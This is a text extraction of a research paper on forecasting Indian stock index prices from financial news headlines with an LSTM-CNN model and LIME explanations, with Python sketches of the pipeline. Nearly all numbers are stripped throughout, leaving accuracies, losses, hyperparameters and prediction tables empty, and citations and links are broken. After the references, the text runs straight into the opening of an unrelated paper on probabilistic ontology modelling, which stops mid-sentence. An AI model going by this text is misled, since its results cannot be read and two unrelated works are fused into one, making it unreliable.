prediction input: processed news headlines instantiate reducelrplateau() instantiate modelcheckpoint() instantiate earlystopping() truncate and pad input sequence while epoch r: ->r for batch_size b: ->b design the model by adding: sequential layer to lstm model embedding layer conv d() and maxpooling d lstm() dense layer fit the model evaluate the model save the model use xai to interpret the model output: table with predicted opening values gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xai input: processed headlines instantiate limetextexplainer() instantiate explain_instance() with appropriate hyperparam- eters(text, pipeline.predict_proba, number of features) create an ordered dictionary of words and weights plot a bar-plot with appropriate axes output: plot of biases of words (weights) vs words procedure selecting the prediction model based on the evaluation done by ghosh et al. ( ) comparing the various models, including simple linear regression such as arima, ar, arma, or nonlinear models such as ann, arch, rnn, lstm it was concluded that lstm could achieve higher accuracy as compared to other models. stock market prediction requires a nonlinear dynamic system; lstm can train themselves with nonlinear input–output pairs. moreover, combining qualitative factors like international events, financial news, news headlines’ sentiments, etc. can achieve much higher accuracy. selecting datasets a dataset of financial news headlines is obtained from pulse. pulse is a news aggregator and it aggregates financial news from various sources thus providing less biased dataset. this dataset is combined with a yahoo finance dataset (yahoo finance, ). since our main focus was on indian stock market prices (hiransha et al., ), we extracted news headlines from the dataset accordingly. moreover, an indication of changes in the stocks (zhang, fuehres & gloor, ) for bse and nse was included. the values represented the stock market prices of the day the news headline was published and of the day after. the dataset was split into % for training, % for validation, and % for testing. the dataset used in this project has , data entries and has parameters: new headlines, website and the timestamp. data preprocessing the data obtained is raw and unprocessed. to perform any computation, processing the data is necessary. for instance, the null data should be removed, and the trivial values should be removed, etc. given below in the fig. is the raw dataset obtained from the sources. this is what the financial news dataset looked like before preprocessing. table shows the features neccessary for our model and we clean the dataset to obtain only these features. steps involved in data preprocessing are represented in fig. : as we are first training the lstm model only for bse-sensex and nse-nifty, we train it on news headlines involving sensex and nifty specific news only. for this, we search for headlines that contain the word: ‘‘sensex’’ (case - independent). gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure dataset before cleaning. the data collected through various sources consists of unwanted and redundant values that need to be processed. full-size doi: . /peerjcs. /fig- table features of clean data. final columns that are used in the dataset that is necessary for the model building and model evaluation. 
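as an illustration of this filtering and cleaning step, the following pandas sketch shows one way the sensex-specific headlines could be extracted from the raw pulse dump. the column names follow the features table (news headline, website, timestamp), but the file name and the exact cleaning choices are placeholder assumptions rather than the authors' actual script.

```python
import pandas as pd

# Load the raw Pulse news dump (file name is a placeholder assumption).
raw = pd.read_csv("pulse_headlines.csv")

# Keep only the columns the model needs (cf. the features table) and drop null rows.
df = raw[["news headline", "website", "timestamp"]].dropna()

# Case-independent filter for Sensex-specific news.
df = df[df["news headline"].str.contains("sensex", case=False, na=False)]

# Basic cleaning: lower-case the text and strip punctuation and extra spaces.
df["news headline"] = (
    df["news headline"]
    .str.lower()
    .str.replace(r"[^a-z0-9\s]", " ", regex=True)
    .str.replace(r"\s+", " ", regex=True)
    .str.strip()
)

print(df.head())
```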
column a column b column c news headline website timestamp figure steps in data preprocessing. (a) dropping: to include only the necessary data, unwanted columns/rows must be dropped; (b) tokenization helps in increasing the speed of computation and efficiency; (c) cleaning is required after tokenization since some words are not necessary for the evaluation; (d) normalizing: by bringing all values in one range, it is easier to compare various values and evaluate the model. full-size doi: . /peerjcs. /fig- after running the code on our cleaned dataset we get this result as shown in fig. . sentiment analysis for stock market news headlines to be able to predict the stock market (patel et al., ), we must understand the market’s sentiment correctly. negative news will lead to a fall in the price of the stock and positive news will lead to rising in the price of the stock. the most commonly used words in a news headline will give rise to an instant trigger of emotions in a particular person’s mind. hence we made a word cloud of the top words commonly occurring in a news headline from our dataset as depicted below in fig. . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure dataset after cleaning. clean dataset, after preprocessing helps in an efficient model building and model evaluation. full-size doi: . /peerjcs. /fig- figure top commonly used words in a news headline by using wordcloud. the wordcloud generated from the data gives the overview of which words in the headline impact stocks. full-size doi: . /peerjcs. /fig- lstm network is a type of rnn that preserves its state. (olah, ) lstm (selvin et al., ) has already provided satisfactory results in the area of text data applications such as machine translation and nlp (bird, klein & loper, ). the headlines are a type of text data; for that reason, it was a rational decision to apply this type of network to our data. figure shows the lstm network architecture used in our project. input news features from different online news sites have been scraped and used as input for our application. then the headlines are cleaned, and the remaining characters are converted to lowercase to overcome identical double words with different capitalization. word embedding is dealt with by changing over the words to their proper index using the top words in the corpus; the rest of the words that are not found in the top words corpus are set to zero. the maximum size of the word embeddings is and zero-padded for smaller headlines. gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure network architecture of lstm network. the network architecture of the lstm network de- picts how the processed headlines are embedded and passed through a cnn layer and further through an lstm cell to output the prediction. full-size doi: . /peerjcs. /fig- lstm - cnn model for news headlines . initially, we have created an instance of reducelronplateau, which reduces the learning rate when a metric has stopped improving accuracy. . secondly, we have a modelcheckpoint callback. it is used for training the model using model.fit() to save a model or weights at some interval, which can be loaded later to continue the training from the state saved. . an instance of earlystopping is created. 
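a minimal keras sketch of this word-to-index conversion and zero-padding step is given below; the vocabulary size, the maximum sequence length and the toy headlines are illustrative placeholders, since the exact values used in the paper are not reproduced here.

```python
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences

# Toy stand-ins for the cleaned Sensex headlines produced in the previous step.
headlines = [
    "sensex surges as bank stocks rally",
    "sensex edges lower ahead of earnings",
]

TOP_WORDS = 5000      # keep only the most frequent words (placeholder value)
MAX_LEN = 30          # maximum headline length in tokens (placeholder value)

# Words outside the top-words vocabulary are skipped by the tokenizer, so the
# remaining positions of short headlines end up as zeros after padding.
tokenizer = Tokenizer(num_words=TOP_WORDS)
tokenizer.fit_on_texts(headlines)
sequences = tokenizer.texts_to_sequences(headlines)

# Shorter headlines are zero-padded and longer ones truncated to a fixed length.
X = pad_sequences(sequences, maxlen=MAX_LEN, padding="post", truncating="post")
print(X.shape)        # (number of headlines, MAX_LEN)
```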
this stops training the model when a particular metric has stopped improving. then the preprocessed data is loaded and only the top n words are kept, and the rest are zero. also, split it into the train dataset and test dataset. the data is then truncated and we pad the input sequence (x_train and x_test). a split of - is done for the train and test. . finally, we create a model. (a) the first layer is constructed using the sequential network model of the keras framework. a sequential model works good enough for vanilla stack layers. each layer has one input tensor and one output tensor exactly. (b) the next layer, i.e., an embedding layer, is added. here, the text data is encoded first. in an embedding, words are defined by dense vectors. each vector serves the projection of the word into a continuous vector space. (c) then a maxpooling d layer is added. a pooling layer is an elementary constituent unit of cnn. the main function of the pooling layer is to sequentially minimize the spatial orientation size and the number of parameters and hence reduce the computation required over the network. the pooling layer operates separately for each feature map. out of all the pooling layers, the one best suited for our model was max pooling. it is depicted as follows: it takes the maximum value over the window defined by pool_size and hence downsamples the input representation. in our model, the pool_size is . figure visualises the working of cnn maxpooling d. next, we then construct an lstm layer of units, as our inputs’ maximum review length is . we then add a dense layer having the activation function of sigmoid as this is our final layer. we also are using an adam optimizer with a learning rate of e− . the gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure cnn maxpooling d. the maxpooliing d layer minimizes the spatial orientation size. the layer works separately on each feature. full-size doi: . /peerjcs. /fig- model is finally compiled and then we save the model. we then print the model summary and the function is called for today and tomorrow parameters. lstm model for ohlc dataset the ohlc dataset consists of open, high, low and close stock prices of a particular company for each period. for this model, we have initially loaded the dataset and split it into test and train data. this dataset does not require much preprocessing as the data and operation over it is very straightforward. once data is loaded we use minmaxscaler() which transforms features by scaling each feature to a given range. the fit_transform method is applied to the instance scl of minmaxscaler() to tokenize the text and output, each dimension corresponding to the frequency of token found in the text. the data is split into input ‘x’ and output ‘y’. it is collected by splitting ‘i’ past days as input x and ‘j" coming days as y. the fit_transform method is applied to the instance scl of minmaxscaler() to tokenize the text and output. then we build the model with the first layer constructed using the sequential model and the next hidden layers using lstm finally, a dense() layer is used for constructing the output. hyperparameters, loss function and optimizer a hyperparameter is a configuration whose value cannot be determined by the dataset. it needs trial experiments where one can manually test which hyperparameter suits best for the model.once fine-tuned the model is trained better. 
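putting these pieces together, a hedged keras sketch of the lstm-cnn classifier described above might look as follows. the binary cross-entropy loss, the adam optimizer, the sigmoid output and the callbacks come from the paper's description, but the layer sizes, filter count, pool size, learning rate and callback thresholds are placeholder values, not the exact hyperparameters used in the experiments.

```python
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Embedding, Conv1D, MaxPooling1D, LSTM, Dense
from tensorflow.keras.callbacks import ReduceLROnPlateau, ModelCheckpoint, EarlyStopping
from tensorflow.keras.optimizers import Adam

TOP_WORDS, MAX_LEN, EMBED_DIM = 5000, 30, 32   # placeholder sizes

# Callbacks: reduce the learning rate on a plateau, keep the best weights,
# and stop early once the validation metric stops improving.
callbacks = [
    ReduceLROnPlateau(monitor="val_loss", factor=0.5, patience=2),
    ModelCheckpoint("best_model.h5", monitor="val_loss", save_best_only=True),
    EarlyStopping(monitor="val_loss", patience=3, restore_best_weights=True),
]

model = Sequential([
    Embedding(input_dim=TOP_WORDS, output_dim=EMBED_DIM, input_length=MAX_LEN),
    Conv1D(filters=32, kernel_size=3, activation="relu"),
    MaxPooling1D(pool_size=2),          # downsample the convolutional feature maps
    LSTM(64),                           # sequence model over the pooled features
    Dense(1, activation="sigmoid"),     # binary sentiment / direction output
])

model.compile(
    loss="binary_crossentropy",
    optimizer=Adam(learning_rate=1e-3),
    metrics=["accuracy"],
)

# X, y: padded index sequences and binary labels prepared earlier (not defined here).
# history = model.fit(X, y, validation_split=0.1, epochs=30,
#                     batch_size=64, callbacks=callbacks)
model.summary()
```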
optimizers are algorithms for altering the attributes as weights and learning rate in order to reduce the loss. table represents the hyperparameters and their values used in the experiment. lime as represented in fig. , after training the model and obtaining predictions the explainer interpretes the model so that the user can make appropriate judgements. after studying various xai (khaleghi, ; ribeiro, singh & guestrin, ) tools like lime, what- if (wexler et al., ), deeplift (shrikumar et al., ), shapely (messalas, christos & gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table hyperparameters, loss function and optimizer and their values used along with detailed com- ments. title value comments loss function binary cross-entropy since the type of classification performed is binary optimizer adam optimization used to enhance the network learning rate . set after trials decay . validation loss does not ameliorate significantly any more for epochs, there will be decay. figure working of xai. the mode generates the prediction, which along with the data, is run through the xai tool. the xai tool explains the data based on the biases to facilitate better decision making. full-size doi: . /peerjcs. /fig- yannis, ), we realized the one which will determine the transparency of our model in the best possible way was lime. according to the study, the what-if tool is an interactive visual tool to help the user comprehend the datasets and better understand the output of tensorflow models. to analyze the models deployed. however, it is well suited for xgboost and scikit learn models. deeplift is a tool that collates the activation of a neuron to its ’reference points’ and assigns contribution scores accordingly. a single backward pass is used to compute scores efficiently. deeplift reveals dependencies that are otherwise missed by other methods giving separate consideration for positive and negative contributions. lime, short for local interpretable model-agnostic explanations (ribeiro, singh & guestrin, ), is a tool that is used to explain what the machine learning model is performing. it is applied to the models which perform behaviour but we do not know how it works. machine learning models (patel et al., ) can be explained using plots, for example, linear regression, decision trees; these are some of the classifiers that can be explained using plots (it can only give an explanation for the global, but it cannot give an explanation of any local observation). but there are some significant data with more complexities and more dimensions that cannot be explained using plots. one of the examples is the neural network; it cannot be explained using plots. gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. by using lime, we can understand what the model does, which features it picks on to create or develop prediction. lime is model-agnostic; it means that it can be used for any black-box model that we know today or can be developed in the future. lime tool is local; it means it is observation specific; it explains every single observation that you have in a dataset. if a model has a high accuracy, can we trust the model without having interpretability? 
the answer is no; we cannot trust it because many models have noises that can predict the output right, but the way the model has predicted will contain some faults which are not good for a long term process. so, interpretability is important for building trust with the model. performance measure validation loss for neural networks we consider the loss to be negative log-likelihood for classification and residual sum of squares for regression. hence the primary aim of our learning model is to decrease the value of the loss function as we tune its parameters by changing weights through different optimization methods. the value of loss suggests how well a certain model runs for each optimization iteration. preferably, after each iteration, we would expect a decrease in the value of the loss. some points should be kept in mind while we observe the decrease in loss value. for example, one may face the problem of overfitting wherein the model memorizes the training dataset examples and becomes less effective for the test dataset. over-fitting also occurs when you do not employ a regularization or normalization. we may have a very intricate model, or the number of data points n is very low. validation accuracy we calculate the accuracy of a model once the model is completely trained. this means that the parameters are fixed, and no further model learning will be taking place. then the test dataset is then inputted into the model, and the number of errors the model makes is reestablished after comparing it with the target values. finally, the percentage of misclassified data is calculated. let us understand this with an example. the model’s accuracy is . % means that out of , test samples, the model classifies of samples correctly. results and discussion result table represents the results generated after performing the experiments. in lstm-cnn the input was the data that we get from preprocessing. the data was then combined with a dataset of the news headlines and the prices. the model which we trained was of the news headlines of sensex. there are a total of epochs to be run in the training of the model. but it stops at the th epoch; this is due to avoiding making the model overfitting. the accuracy of the model in a total of epochs is . %. the loss was . . as we see in fig. : gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table result generated. the lstm-cnn model results using the new headlines dataset and its com- parison with the result generated by the lstm model using the ohlc dataset. the result depicts the ac- curacy and loss of the two models. model dataset no of epochs accuracy loss lstm-cnn news headlines . % . lstm ohlc . % . figure loss lstm -cnn model for news headlines. the loss values for the lstm-cnn model showing that the model was processed till epoch no. , and there was an early stopping to avoid overfitting. full-size doi: . /peerjcs. /fig- epoch :val_acc did not improve from . . there are a total of epochs. they stopped training at to th epochs. this is because of the function earlystopping that helps to avoid the problem of overfitting. the accuracy remains constant after the th epochs, whereas, val_acc starts decreasing due to which training stops. val_acc:- it is the measure of how good are the predictions of the model. so, in our case, the model is very well trained till the th epoch, and after that, the training is not necessary. acc:- it gives the percentage of instances that are correctly classified. 
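a minimal sketch of how lime can be applied to the trained headline classifier is shown below. it assumes the tokenizer, MAX_LEN and model objects from the earlier sketches, the class names and the example headline are placeholders, and the probability wrapper is an assumed stand-in for the pipeline.predict_proba function mentioned in the algorithm.

```python
import numpy as np
from lime.lime_text import LimeTextExplainer
from tensorflow.keras.preprocessing.sequence import pad_sequences

def predict_proba(texts):
    """Wrap the trained Keras model so LIME can query it on raw headline strings."""
    seqs = pad_sequences(tokenizer.texts_to_sequences(texts), maxlen=MAX_LEN)
    p_pos = model.predict(seqs).reshape(-1, 1)       # probability of the positive class
    return np.hstack([1.0 - p_pos, p_pos])           # LIME expects one column per class

explainer = LimeTextExplainer(class_names=["negative", "positive"])
exp = explainer.explain_instance(
    "sensex surges as bank stocks rally",            # placeholder headline to explain
    predict_proba,
    num_features=10,                                 # number of words to weight
)

# Ordered (word, weight) pairs; these are the per-word biases plotted in the paper.
for word, weight in exp.as_list():
    print(f"{word:>12s}  {weight:+.3f}")
```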
in our case, the percentage is . %. val_loss:- val_loss is the loss that is applied to the testing set, whereas, the loss is applied to the training set. val_loss is the best to depend on to avoid the problem of overfitting. overfitting is when the model is fit too closely to the training data. the val_loss and loss keep on decreasing, whereas acc and val_acc are kept on increasing this shows that our model is well-trained. figure visualises the loss over number of epochs. as according to the plot obtained after training, we observe that initially, the loss is very high; however the validation loss is low relatively. once the epochs progress, the loss decreases, thus providing better learning for our model. the point where the loss and validation loss plateaus are the point where no further learning might be possible with the same amount of data for the same number of epochs. although the accuracy of lstm-cnn with news headlines data is less than lstm with ohlc data, since we are interpreting the model, it is adding another perspective of viewing at the model, which makes it a better model. when compared with rnn-cnn (tan et al., ; zhang, chen & huang, gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure loss for lstm for ohlc data. graph comparing the loss vs. val_loss for the ohlc dataset for the lstm model shows as the number of epochs progresses, the values of loss and val_loss tend to de- crease and plateau to approximately . . full-size doi: . /peerjcs. /fig- figure sample , feature weights given by lime. result obtained by lime tool after modeling it. we get a cumulative , explanation features. each word is weighted. full-size doi: . /peerjcs. /fig- ) model , which it performs way better since not only does it remember small term information but also long term information. results of xai as for the first model,as shown in fig. , we get a cumulative , explanation features. the word surge is mostly related in a negative context and hence is having a negative weight. similarly, higher is mostly in those sentences which depict the growth of stocks and hence is having positive weight. we can also observe the word sensex having near about neutral weight as it has both positive and negative references. thus depicts both falls as gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table results of lime tool. the sample of the result obtained by the lime tool where each word is as- signed weight or bias. test words weights or biases (approx) surge − . baroda + . higher + . edges + . live + . bank + . sensex − . of − . sbi − . figure prediction results. bar graph depicting predicted open vs. actual open. the red bar shows the actual open prices, and the blue bar shows the predicted opening prices for days. full-size doi: . /peerjcs. /fig- well as the rise of stocks. by table , we can thus interpret our data and thus understand the biases in the dataset. our model is not just a black box now, and the customers know the insides of the system through just one graph. thus we achieve the explanations along with the insights from the data. test results as shown in above fig. , the trained model can now be tested for predictions. the blue bar represents the predicted value, and the red bar represents the actual value obtained from the dataset. 
this gives us a fair understanding of the output. if we want to test for the real-time news, we can enter news that gets preprocessed and get a measure of the opening price, i.e., how much did the opening price rise or fall from the previous opening price. we present values in table for getting the exact idea of these values and gauge the accuracy of our predictions. the table below shows the following: date of actual open , previous closing price, predicted opening price by our model, actual opening price, rise / fall in price, error percentage, chi-squared test. here the: rise/fall is given by: (predicted open -previous close) ( . ) gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table set of predictions made. the table with the final set of predictions along with comparisons with actual opening prices, calculations for rise/fall, error percentage, and the chi-squared test. test case date previous close predicted open actual open rise/fall error(%) chi-squared test / / . . . . . . / / . . . − . . . / / . . . . . . / / . . . − . . . / / . . , . . . . / / . . , . − . . . / / . . , . . . . error percentage is given by: abs((actual-predicted)/(actual ))* ( . ) chi-square is given by:(actual - predicted) /predicted ( . ) as presented above in table , seven test cases have been stated with the stock market prices along with the rise and fall of those values. the error represents the value difference in percentage (actual-predicted by our model) and for our test cases, it’s showing in the range . to . . thus, we could manage to predict the indian stock market price using xai by referring to the impact of financial news articles. also the chi-square test allows us to assess how much is the observed data varying from actual data. conclusion and future scope the financial news articles play a major role in the movement of the stock price. financial news plays a dominant factor in how a particular company’s stock is perceived by the investors at a given time. making predictions based on news headlines can help budding investors learn how and when stock prices fall or rise and take a decision based on the same. our proposed model created an explainable model that gives this explanation as well as maintains and thus makes the output meaningful. this was done with the xai using the tool lime. future research directions could be automated predictions from a news headline from a financial website and a multilingual financial news headline prediction. we can also add emotion-based gifs to add a fun element and make it more appealing for the learner. the prediction model can be used as a decision-maker for an algorithmic trading model. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • shilpa gite and ketan kotecha analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • hrituja khatavkar conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. 
• shilpi srivastava conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • priyam maheshwari performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • neerav pandey performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data, including financial news headlines obtained from pulse and data from yahoo finance, is available in the supplementary files. code is available at github: https://github.com/hrituja/stock-market-prediction. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bird s, klein e, loper e. . natural language processing with python. available at https://b-ok.cc/book/ /be d ?dsource=recommend (accessed on july ). cho k, merrienboer bv, gulcehre c, bahdanau d, bougares f, schwenk h, bengio y. . learning phrase representations using rnn encoder-decoder for statistical machine translation. in: proceedings of the conference on empirical methods in natural language processing (emnlp). doi . /v /d - . doran d, schulz s, besold tr. . what does explainable ai really mean? a new conceptualization of perspectives. arxiv preprint. arxiv:abs/ . . egeli b, ozturan m, badur b. . stock market prediction using artificial neural networks. in: proceedings of the rd international conference on business, hawaii, – june . – . ghosh a, bose b, maji g, debnath nn, sen s. . stock price prediction using lstm on indian share market. easychair : – doi . /qgcz. greff k, srivastava rk, koutnik j, steunebrink br, schmidhuber j. . lstm: a search space odyssey. arxiv preprint. arxiv: . . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information https://github.com/hrituja/stock-market-prediction http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://b-ok.cc/book/ /be d ?dsource=recommend http://dx.doi.org/ . /v /d - http://arxiv.org/abs/abs/ . http://dx.doi.org/ . /qgcz http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. hiransha m, gopalakrishnan ea, vijaykrishna m, soman kp. . nse stock market prediction using deep-learning models. procedia computer science : – doi . /j.procs. . . . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – doi . /neco. . . . . kalyani j, bharathi hn, rao j. . stock trend prediction using news sentiment analysis’’. international journal of computer science & information technology (ijcsit) ( ): – . khaleghi b. . the how of explainable ai: post-modelling explainability. towards media science. available at https://towardsdatascience.com/the-how-of-explainable- ai-post-modelling-explainability- b cbc adf f (accessed on july ). kim h, won c. . forecasting the volatility of stock price index: a hybrid model inte- grating lstm with multiple garch-type models. expert systems with applications : – doi . /j.eswa. . . . messalas a, christos m, yannis k. . model-agnostic interpretability with shapley values. doi . /iisa. . . moghar a, hamiche m. . stock market prediction using lstm recurrent neural net- work. procedia computer science : – doi . /j.procs. . . . 
nayak a, pai mm, pai rm. . prediction models for indian stock market. procedia computer science : – . olah c. . understanding lstm networks. [blog post]. available at https://colah. github.io/posts/ - -understanding-lstms/ (accessed on july ). patel j, shah s, thakkar p, kotecha k. . predicting stock and stock price index movement using trend deterministic data preparation and machine learning tech- niques. expert systems with applications : – doi . /j.eswa. . . . patel j, shah s, thakkar p, kotecha k. . predicting stock market index using fusion of machine learning techniques. expert systems with applications : – doi . /j.eswa. . . . pathmind, inc. . a beginner’s guide to lstms and recurrent neural networks. available at https://pathmind.com/wiki/lstm. pulse by zerodha. . pulse by zerodha—the latest financial and market news from all major indian news sources aggregated in one place. available at https://pulse. zerodha.com/ (accessed on july ). ribeiro m, singh s, guestrin c. . ’’why should i trust you?’’: explaining the predictions of any classifier. : – doi . /v /n - . saffar m. . how explainable artificial intelligence (xai) can help us trust ai. medium. available at https://medium.com/altaml/how-explainable-artificial- intelligence-xai-can-help-us-trust-ai- f b d (accessed on july ). selvin s, vinayakumar r, gopalakrishnan ea, menon vk, soman kp. . stock price prediction using lstm, rnn and cnn-sliding window model. in: international conference on advances in computing, communications and informatics (icacci). doi . /icacci. . . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /neco. . . . https://towardsdatascience.com/the-how-of-explainable-ai-post-modelling-explainability- b cbc adf f https://towardsdatascience.com/the-how-of-explainable-ai-post-modelling-explainability- b cbc adf f http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /iisa. . http://dx.doi.org/ . /j.procs. . . https://colah.github.io/posts/ - -understanding-lstms/ https://colah.github.io/posts/ - -understanding-lstms/ http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . https://pathmind.com/wiki/lstm https://pulse.zerodha.com/ https://pulse.zerodha.com/ http://dx.doi.org/ . /v /n - https://medium.com/altaml/how-explainable-artificial-intelligence-xai-can-help-us-trust-ai- f b d https://medium.com/altaml/how-explainable-artificial-intelligence-xai-can-help-us-trust-ai- f b d http://dx.doi.org/ . /icacci. . http://dx.doi.org/ . /peerj-cs. sherstinsky a. . fundamentals of recurrent neural network (rnn) and long short- term memory (lstm) network. physica d: nonlinear phenomena : doi . /j.physd. . . shrikumar a, greenside p, shcherbina a, kundaje a. . not just a black box: learning important features through propagating activation differences.. tan kk, le nqk, yeh hy, chua mch. . ensemble of deep recurrent neural networks for identifying enhancers via dinucleotide physicochemical properties. cell ( ): doi . /cells . Ţiţan ag. . the efficient market hypothesis: review of specialized litera- ture and empirical research. procedia economics and finance : – doi . /s - ( ) - . vargas mr, lima bs, evsuko a. . deep learning for stock market prediction from financial news articles. in: ieee international conference on computational intelligence and virtual environments for measurement systems and applications (civemsa). piscataway: ieee, – . wexler j, pushkarna m, bolukbasi t, wattenberg m, viega f, wilson j. . 
the what-if tool: interactive probing of machine learning models. ieee transactions on visualization and computer graphics : – doi . /tvcg. . . yahoo finance. . yahoo finance–stock market live, quotes, business & finance news. available at https://in.finance.yahoo.com/ (accessed on july ). yoo pd, kim mh, jan t. . machine learning techniques and use of event infor- mation for stock market prediction: a survey and evaluation. in: international conference on computational intelligence for modeling, control and automation (cimca ). piscataway: ieee, – . zhang x, chen f, huang r. . a combination of rnn and cnn for attention-based relation classification. procedia computer science : – doi . /j.procs. . . . zhang x, fuehres h, gloor pa. . predicting stock market indicators through twitter ’’i hope it is not as bad as i fear. procedia - social and behavioral sciences : – doi . /j.sbspro. . . . gite et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.physd. . http://dx.doi.org/ . /cells http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /tvcg. . https://in.finance.yahoo.com/ http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /j.sbspro. . . http://dx.doi.org/ . /peerj-cs. submitted october accepted july published august corresponding author kathryn b. laskey, klaskey@gmu.edu academic editor sandra gesing additional information and declarations can be found on page doi . /peerj-cs. copyright carvalho et al. distributed under creative commons cc-by . open access uncertainty modeling process for semantic technology rommel n. carvalho , , kathryn b. laskey and paulo c.g. da costa department of research and strategic information, office of the comptroller general of brazil, brasília, df, brazil department of computer science, universidade de brasília, brasília, df, brazil department of systems engineering and operations research, george mason university, fairfax, va, united states of america abstract the ubiquity of uncertainty across application domains generates a need for principled support for uncertainty management in semantically aware systems. a probabilistic ontology provides constructs for representing uncertainty in domain ontologies. while the literature has been growing on formalisms for representing uncertainty in ontologies, there remains little guidance in the knowledge engineering literature for how to design probabilistic ontologies. to address the gap, this paper presents the un- certainty modeling process for semantic technology (ump-st), a new methodology for modeling probabilistic ontologies. to explain how the methodology works and to verify that it can be applied to different scenarios, this paper describes step-by-step the construction of a proof-of-concept probabilistic ontology. the resulting domain model can be used to support identification of fraud in public procurements in brazil. while the case study illustrates the development of a probabilistic ontology in the pr-owl probabilistic ontology language, the methodology is applicable to any ontology formalism that properly integrates uncertainty with domain semantics. subjects artificial intelligence, world wide web and web science, software engineering keywords pr-owl, mebn, up, methodology, ump-st, semantic web, bayesian networks, uncertainty, modeling, semantic technology introduction the ability to represent and reason with uncertainty is important across a wide range of domains. 
for this reason, there is a need for a well-founded integration of uncertainty representation into ontology languages. in recognition of this need, the past decade has seen a significant increase in formalisms that integrate uncertainty representation into ontology languages. this has given birth to several new languages such as: pr-owl (costa, ; costa, laskey & laskey, ; costa, laskey & laskey, ; carvalho, ; carvalho, laskey & costa, ), ontobayes (yang & calmet, ), bayesowl (ding, peng & pan, ), p-classic (koller, levy & pfeffer, ) and probabilistic extensions of shif(d) and shoin(d) (lukasiewicz, ). however, the increased expressive power of these languages creates new challenges for the ontology designer. in addition to developing a formal representation of entities and relationships in a domain, the ontology engineer must develop a formal characterization of the uncertainty associated with attributes of entities and relationships among them. how to cite this article carvalho et al. ( ), uncertainty modeling process for semantic technology. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:klaskey@gmu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. while a robust literature exists in both ontology engineering (allemang & hendler, ; gomez-perez, corcho & fernandez-lopez, ) and knoweldge engineering for probability models (laskey & mahoney, ; druzdzel & van der gaag, ; korb & nicholson, ; o’hagan et al., ), these fields have developed largely independently. the literature contains very little guidance on how to build ontologies that capture knowledge about domain uncertainties. to fill the gap, this paper describes the uncertainty modeling process for semantic technology (ump-st), a methodology for defining a probabilistic ontology and using it for plausible reasoning in applications that use semantic technology. the methodology is illustrated through a use case in which semantic technology is applied to the problem of identifying fraud in public procurement in brazil. the purpose of the use case is to show how to apply the methodology on a simplified but realistic problem, and to provide practical guidance to probabilistic ontology designers on how to apply the ump-st. this paper goes beyond previous work on ump-st (e.g., haberlin, ; carvalho et al., ; alencar, ) to provide a comprehensive explanation of the methodology in the context of application to a real world problem, along with pragmatic suggestions for how to apply the methodology in practice. for purpose of exposition, our focus is primarily on the procurement fraud use case, but the ump-st is applicable to any domain in which semantic technology can be applied. our purpose is not to provide rigorous scientific evidence for the value of ump-st in comparison with any other methodology or no methodology. de hoog ( ) says, ‘‘it is extremely difficult to judge the value of a methodology in an objective way. experimentation is of course the proper way to do it, but it is hardly feasible because there are too many conditions that cannot be controlled.’’ the value of a methodology like 